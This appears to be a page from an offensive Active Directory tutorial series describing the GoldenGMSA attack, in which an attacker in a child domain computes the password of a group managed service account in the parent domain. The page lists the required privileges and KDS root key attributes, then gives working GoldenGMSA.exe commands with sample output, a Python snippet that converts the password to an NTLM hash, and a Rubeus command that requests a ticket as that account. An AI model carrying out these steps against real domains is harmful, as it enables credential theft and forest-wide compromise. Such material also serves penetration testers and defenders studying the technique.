GoldenGMSA Attack

If we discover a gMSA account in a parent domain we can compromise it from the child domain with the GoldenGMSA tool and obtain its password.

For the attack to work we need the following rights:

Membership in the Enterprise Admins group in forest root domain
Membership in the Domain Admins group in forest root domain
Access to a domain controller as NT/AUTHORITY SYSTEM

These will be used to read a list of attributes from the msKds-ProvRootKey objects in CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,DC=domain,DC=com of the parent domain.

cn
msKds-SecretAgreementParam
msKds-RootKeyData
msKds-KDFParam
msKds-KDFAlgorithmID
msKds-CreateTime
msKds-UseStartTime
msKds-Version
msKds-DomainID
msKds-PrivateKeyLength
msKds-PublicKeyLength
msKds-SecretAgreementAlgorithmID

Normally, these attributes should only be accessible by certain users of the root domain, but they are also propagated to the child DC.

Fortunately the GoldenGMSA tool makes the process totally automatic and will fetch the needed attributes if ran in the appropriate context.

Online Attack & Computation

The online attack queries the parent domain to obtain the gMSA's SID and uses it to calculate the password by querying both domains.

From a SYSTEM shell we'll execute the tool

.\GoldenGMSA.exe gmsainfo --domain domain.com
sAMAccountName:         name$
objectSid:              S-1-5-21-2879935145-656083549-3766571964-1106
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAaQEAABEAAAAfAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA

Once the SID is found we can use it to compute the gMSA account's password

.\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --forest dev.domain.com --domain domain.com
Base64 Encoded Password:        WITSKRtGahQFvL/iUmJfQbRIJ7S7GMW+nKUj+TlJ4YZJyZ6pjlp5caC78rC4oY6woKxe294/hPCCl6nL2NNWSmj6f1GlmFKvizvlABXVpLqIGbQvyZEbYhPr+twasnf4m+B0qmwj4fXUx8qQAy+cEIV8sd18ZvOLKet7259cIbXTV1lbO3gxIEmDDjMmgP6QD1GQDHnr4xxgwR5YKZC9CbK01db3SWlpPYxElx30MGwzMLtL17ccxmGYAMzqNq/R9ldEq/hC4WDJ3hGg4CVagcOuHOQPOJ6Nh0+x4CBE46CoshfID+3wyswFI/akytdBDVyNk1hj9KH4v/kizCPw6A==

Offline Attack & Computation

The offline attack fetches the SID and msds-ManagedPasswordID from the parent domain, the kdsinfo from the child domain and uses calculates the password for the gMSA account by manually supplying the KDS Key and account SID.

.\GoldenGMSA.exe gmsainfo --domain domain.com
.\GoldenGMSA.exe kdsinfo --forest dev.domain.com
.\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --kdskey <BASE64 BLOB>

Now we should have a base64-encoded password, to convert it to a RC4 / NTLM hash we can use the following script

from Crypto.Hash import MD4
import base64

base64_input  = "<BASE64 PASSWORD"

print(MD4.new(base64.b64decode(base64_input)).hexdigest())

With the hash we're able to request a TGT as the gMSA account

.\Rubeus.exe asktgt /user:name$ /rc4:32ac66cd327aa76b3f1ca6eb82a801c5 /domain:domain.com /ptt

PreviousGPO On-Site Attack NextDNS Trust Attack

Last updated 1 year ago